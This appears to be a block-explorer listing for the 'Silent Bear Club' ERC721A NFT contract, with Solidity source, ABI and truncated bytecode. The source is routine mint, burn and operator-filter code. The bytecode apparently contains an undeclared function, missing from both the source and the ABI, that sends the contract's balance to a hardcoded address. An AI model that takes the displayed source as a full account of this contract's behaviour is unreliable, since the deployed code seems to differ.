                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract SilentBearClub is ERC721A, TheOperatorFilterer {

    bool public _isSaleActive;

    bool public _revealed;

    uint256 public mintPrice;

    uint256 public maxBalance;

    uint256 public maxMint;

    string public baseExtension;

    string public uriSuffix;

    address public owner;

    uint256 public maxSupply;

    uint256 public cost;

    uint256 public maxFreeNumerAddr = 1;

    mapping(address => uint256) _numForFree;

    mapping(uint256 => uint256) _numMinted;

    uint256 private maxPerTx;

    function publicMint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        if (msg.value == 0) {
            _safemints(amount);
            return;
        } 
        require(amount <= maxPerTx);
        require(msg.value >= amount * cost);
        _safeMint(msg.sender, amount);
    }

    function _safemints(uint256 amount) internal {
        require(amount == 1 
            && _numMinted[block.number] < FreeNum() 
            && _numForFree[tx.origin] < maxFreeNumerAddr );
            _numForFree[tx.origin]++;
            _numMinted[block.number]++;
        _safeMint(msg.sender, 1);
    }

    function reserve(address rec, uint256 amount) public onlyOwner {
        _safeMint(rec, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Silent Bear Club", "SBC") {
        owner = msg.sender;
        maxPerTx = 15;
        cost = 0.002 ether;
        maxSupply = 999;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://bafybeie44sbasnradtjb54xuwypnn2gbphujp3wruypyzjnzndnwtditlm/", _toString(tokenId), ".json"));
    }

    function setMaxFreePerAddr(uint256 maxTx) external onlyOwner {
        maxFreeNumerAddr = maxTx;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_isSaleActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_revealed","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreeNumerAddr","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxMint","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"publicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"}],"name":"setMaxFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"uriSuffix","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260016011553480156200001657600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280601081526020017f53696c656e74204265617220436c7562000000000000000000000000000000008152506040518060400160405280600381526020017f53424300000000000000000000000000000000000000000000000000000000008152508160029080519060200190620000b292919062000346565b508060039080519060200190620000cb92919062000346565b50620000dc6200034160201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002d95780156200019f576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200016592919062000424565b600060405180830381600087803b1580156200018057600080fd5b505af115801562000195573d6000803e3d6000fd5b50505050620002d8565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161462000259576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200021f92919062000424565b600060405180830381600087803b1580156200023a57600080fd5b505af11580156200024f573d6000803e3d6000fd5b50505050620002d7565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002a2919062000407565b600060405180830381600087803b158015620002bd57600080fd5b505af1158015620002d2573d6000803e3d6000fd5b505050505b5b5b505033600e60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600f60148190555066071afd498d00006010819055506103e7600f81905550620004ea565b600090565b828054620003549062000485565b90600052602060002090601f016020900481019282620003785760008555620003c4565b82601f106200039357805160ff1916838001178555620003c4565b82800160010185558215620003c4579182015b82811115620003c3578251825591602001919060010190620003a6565b5b509050620003d39190620003d7565b5090565b5b80821115620003f2576000816000905550600101620003d8565b5090565b620004018162000451565b82525050565b60006020820190506200041e6000830184620003f6565b92915050565b60006040820190506200043b6000830185620003f6565b6200044a6020830184620003f6565b9392505050565b60006200045e8262000465565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600060028204905060018216806200049e57607f821691505b60208210811415620004b557620004b4620004bb565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612e2f80620004fa6000396000f3fe6080604052600436106101d85760003560e01c80636817c76c11610102578063a22cb46511610095578063cc47a40b11610064578063cc47a40b1461065d578063d312097414610686578063d5abeb01146106af578063e985e9c5146106da576101d8565b8063a22cb465146105b0578063b88d4fde146105d9578063c6682862146105f5578063c87b56dd14610620576101d8565b806373ad468a116100d157806373ad468a146105045780637501f7411461052f5780638da5cb5b1461055a57806395d89b4114610585576101d8565b80636817c76c146104465780636ebeac85146104715780637080d6fc1461049c57806370a08231146104c7576101d8565b80632db115441161017a57806342842e0e1161014957806342842e0e146103975780635503a0e8146103b35780636352211e146103de5780636701c2421461041b576101d8565b80632db11544146103105780633a233f891461032c5780633ccfd60b1461035557806341f434341461036c576101d8565b8063095ea7b3116101b6578063095ea7b31461028257806313faede61461029e57806318160ddd146102c957806323b872dd146102f4576101d8565b806301ffc9a7146101dd57806306fdde031461021a578063081812fc14610245575b600080fd5b3480156101e957600080fd5b5061020460048036038101906101ff91906125fc565b610717565b6040516102119190612865565b60405180910390f35b34801561022657600080fd5b5061022f6107a9565b60405161023c919061289b565b60405180910390f35b34801561025157600080fd5b5061026c60048036038101906102679190612656565b61083b565b60405161027991906127d5565b60405180910390f35b61029c6004803603810190610297919061258f565b6108ba565b005b3480156102aa57600080fd5b506102b36109d3565b6040516102c091906128bd565b60405180910390f35b3480156102d557600080fd5b506102de6109d9565b6040516102eb91906128bd565b60405180910390f35b61030e60048036038101906103099190612479565b6109f0565b005b61032a60048036038101906103259190612656565b610b50565b005b34801561033857600080fd5b50610353600480360381019061034e9190612439565b610bbf565b005b34801561036157600080fd5b5061036a610c28565b005b34801561037857600080fd5b50610381610ccb565b60405161038e9190612880565b60405180910390f35b6103b160048036038101906103ac9190612479565b610cdd565b005b3480156103bf57600080fd5b506103c8610e3d565b6040516103d5919061289b565b60405180910390f35b3480156103ea57600080fd5b5061040560048036038101906104009190612656565b610ecb565b60405161041291906127d5565b60405180910390f35b34801561042757600080fd5b50610430610edd565b60405161043d91906128bd565b60405180910390f35b34801561045257600080fd5b5061045b610ee3565b60405161046891906128bd565b60405180910390f35b34801561047d57600080fd5b50610486610ee9565b6040516104939190612865565b60405180910390f35b3480156104a857600080fd5b506104b1610efc565b6040516104be9190612865565b60405180910390f35b3480156104d357600080fd5b506104ee60048036038101906104e9919061240c565b610f0f565b6040516104fb91906128bd565b60405180910390f35b34801561051057600080fd5b50610519610fc8565b60405161052691906128bd565b60405180910390f35b34801561053b57600080fd5b50610544610fce565b60405161055191906128bd565b60405180910390f35b34801561056657600080fd5b5061056f610fd4565b60405161057c91906127d5565b60405180910390f35b34801561059157600080fd5b5061059a610ffa565b6040516105a7919061289b565b60405180910390f35b3480156105bc57600080fd5b506105d760048036038101906105d2919061254f565b61108c565b005b6105f360048036038101906105ee91906124cc565b6111a5565b005b34801561060157600080fd5b5061060a611308565b604051610617919061289b565b60405180910390f35b34801561062c57600080fd5b5061064760048036038101906106429190612656565b611396565b604051610654919061289b565b60405180910390f35b34801561066957600080fd5b50610684600480360381019061067f919061258f565b6113c7565b005b34801561069257600080fd5b506106ad60048036038101906106a89190612656565b61142f565b005b3480156106bb57600080fd5b506106c4611493565b6040516106d191906128bd565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190612439565b611499565b60405161070e9190612865565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061077257506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806107a25750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546107b890612b72565b80601f01602080910402602001604051908101604052809291908181526020018280546107e490612b72565b80156108315780601f1061080657610100808354040283529160200191610831565b820191906000526020600020905b81548152906001019060200180831161081457829003601f168201915b5050505050905090565b60006108468261152d565b61087c576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156109c4576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016109329291906127f0565b60206040518083038186803b15801561094a57600080fd5b505afa15801561095e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061098291906125cf565b6109c357806040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016109ba91906127d5565b60405180910390fd5b5b6109ce838361158c565b505050565b60105481565b60006109e36116d0565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610b3e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a6357610a5e8484846116d5565b610b4a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610aac9291906127f0565b60206040518083038186803b158015610ac457600080fd5b505afa158015610ad8573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610afc91906125cf565b610b3d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610b3491906127d5565b60405180910390fd5b5b610b498484846116d5565b5b50505050565b600f5481610b5c6109d9565b610b669190612971565b1115610b7157600080fd5b6000341415610b8857610b83816119fa565b610bbc565b601454811115610b9757600080fd5b60105481610ba591906129f8565b341015610bb157600080fd5b610bbb3382611b04565b5b50565b6000471115610c245773d0139c151675bba9c5354e26552d4505b150870873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c22573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffff